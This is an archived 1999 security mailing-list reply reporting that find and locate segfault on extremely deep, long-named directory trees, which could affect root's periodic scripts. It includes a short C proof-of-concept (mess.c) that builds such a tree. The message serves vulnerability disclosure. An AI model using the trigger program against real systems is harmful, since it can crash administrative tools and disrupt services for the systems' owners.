Re: Buffer overflow in ftpd and locate bug

From: Przemyslaw Frasunek (venglinat_private)
Date: Wed Dec 31 1969 - 15:59:59 PST

Next message: Gary Kalbfleisch: "FW: NT Security: Domain user adding self to Domain Admin group."

Previous message: Flavio Veloso: "MSIE 5 favicon bug"
Next in thread: Crispin Cowan: "Re: Buffer overflow in ftpd and locate bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body

>   I had problem with locate from findutils-4.1.24.rpm from Redhat-5.1
> It segfaults if we have huge directory at incoming ftp which created
> by exploits for ftpd realpath hole. My ftpd is patched. Those exploits
> ,i think, should not afraid me, but if updatedb puts to locate database
> that directory then locate segfaults. ( getline.c 104 row by gdb )
> I guess it can be used for running arbitrary commands if root runs locate.

  I've noticed a similar problem with /usr/bin/find on FreeBSD. By
creating _very_ long and deep directory structure it's possible
to segfault /usr/bin/find (it's also used in /etc/periodic scripts,
which runs on root).

  Example:

  I'm creating a directory structure with 300 subdirectories, each
255 chars length (source in attachment, also it's possible to do it
via ftpd, because it calls mkdir() and chdir()).

lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)

  Gdb shows, that functions puts() was overflowed, when it tried to
print a very long path.

  Also other system tools (rm, ls) has big problems with such
directory structures.

--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglinat_private ** PGP:D48684904685DF43EA93AFA13BE170BF *
--Message-Boundary-25450
Content-type: text/plain; charset=US-ASCII
Content-disposition: inline
Content-description: Attachment information.

The following section of this message contains a file attachment
prepared for transmission using the Internet MIME message format.
If you are using Pegasus Mail, or any another MIME-compliant system,
you should be able to save it or view it from within your mailer.
If you cannot, please ask your system administrator for assistance.

   ---- File information -----------
     File:  mess.c
     Date:  2 May 1999, 19:01
     Size:  748 bytes.
     Type:  Text

--Message-Boundary-25450
Content-type: Application/Octet-stream; name=mess.c; type=Text
Content-disposition: attachment; filename="mess.c"

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>

#define DUMP 0x41

main(int argc, char *argv[]) {

	char buf[255];
	int i = 0;

	if (argc < 3) { fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]); exit(1); }

	if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); }

	memset(buf, DUMP, 255);
	for(i=0;i<(atoi(argv[2]))-1;i++) {
	  if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
	  if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
	}

	exit(0);
}

--Message-Boundary-25450--

Next message: Gary Kalbfleisch: "FW: NT Security: Domain user adding self to Domain Admin group."
Previous message: Flavio Veloso: "MSIE 5 favicon bug"
Next in thread: Crispin Cowan: "Re: Buffer overflow in ftpd and locate bug"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:44:42 PDT